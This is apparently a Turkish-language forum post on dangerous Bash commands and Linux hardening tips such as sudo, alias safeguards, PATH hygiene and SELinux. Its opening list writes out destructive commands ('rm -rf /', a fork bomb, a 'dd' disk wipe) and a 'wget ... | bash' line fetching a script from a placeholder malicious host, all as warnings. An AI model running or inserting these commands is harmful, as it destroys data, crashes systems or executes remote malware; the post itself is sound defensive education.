Thread Starter
#0
Zararlı Bash Komutları Nelerdir?
Bash shell üzerinden çalıştırılan bazı komutlar, istemeden sistemde büyük hasarlara neden olabilir. İşte dikkat edilmesi gereken bazı örnekler:
- rm -rf / : Tüm dosya sistemini siler.
- :(){ :|:& };: : Fork bomb adı verilen sistem kilitleyici bir komut.
- dd if=/dev/zero of=/dev/sda : Sabit diski tamamen sıfırlar.
- wget http://zararlı.com/malware.sh | bash : İnternetten zararlı bir betik indirip çalıştırır.
Bu gibi komutlar, sistemin çökmesine veya veri kaybına neden olabilir.
Zararlı Komutlardan Korunma Yöntemleri
1. Root Yetkilerini Sınırlayın
Root hesabı ile yapılan işlemler sistemi doğrudan etkiler. Bu nedenle:
- Kullanıcıların sudo ile yetkilendirilmesi tercih edilmeli.
- Her kullanıcıya minimum yetki verilmeli.
2. Bash Alias Kullanarak Tehlikeli Komutları Engelleyin
Tehlikeli komutlar için alias tanımlayarak yanlışlıkla çalıştırılmalarının önüne geçilebilir:
BASH
123alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'
3. Güvenlik Duvarı ve IDS/IPS Sistemleri Kullanın
Zararlı komutların dış ağdan tetiklenmesini engellemek için firewall, Snort, Fail2ban gibi sistemler devreye alınabilir.
4. Bash Betiklerini ve Logları Denetleyin
- ~/.bash_history ve /var/log/auth.log gibi log dosyaları düzenli kontrol edilmelidir.
- Otomatik script'lerin içeriği manuel olarak incelenmeli.
5. PATH Değerlerini Güvenli Tutun
Zararlı yazılımlar, sahte ls, cd, rm gibi komutlarla kullanıcıyı kandırabilir. Bu nedenle $PATH değişkeni şu şekilde temiz tutulmalıdır:
BASH
1export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
6. SELinux ve AppArmor Kullanın
SELinux veya AppArmor gibi güvenlik modülleriyle uygulamaların sistem kaynaklarına erişimi sınırlandırılabilir.
[IMG width="249px" size="1050x1050"]https://i.hizliresim.com/a6d55tm.png[/IMG]